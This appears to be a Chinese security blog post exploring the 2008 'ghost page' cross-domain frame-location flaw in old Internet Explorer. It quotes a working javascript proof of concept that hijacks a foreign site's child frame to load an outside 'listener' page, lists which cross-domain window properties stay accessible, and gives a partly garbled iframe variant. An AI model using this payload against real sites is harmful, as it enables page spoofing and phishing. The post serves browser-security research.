“鬼页” 继续

为了不落后，也学习下鬼页。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码：

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

QZ说 这段代码展示了跨域操作location ，事实也是。
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码

结果：

名称	值
onbeforeunload	null
onafterprint	null
top	[object]
location
parent	[object]
offscreenBuffering	Access is denied.
frameElement	Access is denied.
onerror	null
screen	Access is denied.
event	Access is denied.
clipboardData	Access is denied.
onresize	null
defaultStatus	Access is denied.
onblur	null
window	[object]
onload	null
onscroll	null
screenTop	Access is denied.
onfocus	null
Option	Access is denied.
length	0
onbeforeprint	null
frames	[object]
self	[object]
clientInformation	Access is denied.
XMLHttpRequest	Access is denied.
external	Access is denied.
screenLeft	Access is denied.
opener	undefined
onunload	null
document	Access is denied.
closed	false
history	Access is denied.
Image	Access is denied.
navigator	Access is denied.
status	Access is denied.
onhelp	null
name	Access is denied.

除开 on开头的一些事件外，只有下面几个可以使用。

top	[object]
location
parent	[object]

window

[object]

length

0

closed

false

也就是说 POC代码中的x.frames[0].location 有据可依。我们继续测试下是否只有 '鬼页'的
x.frames[0].location 可控制呢，简单修改下代码遍历 iframe 对象：

  
    id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
 

 
同样得到可访问对象  location

top	[object]
location
parent	[object]

新的POC：

 
 

   id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">

最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议，待进一步测试。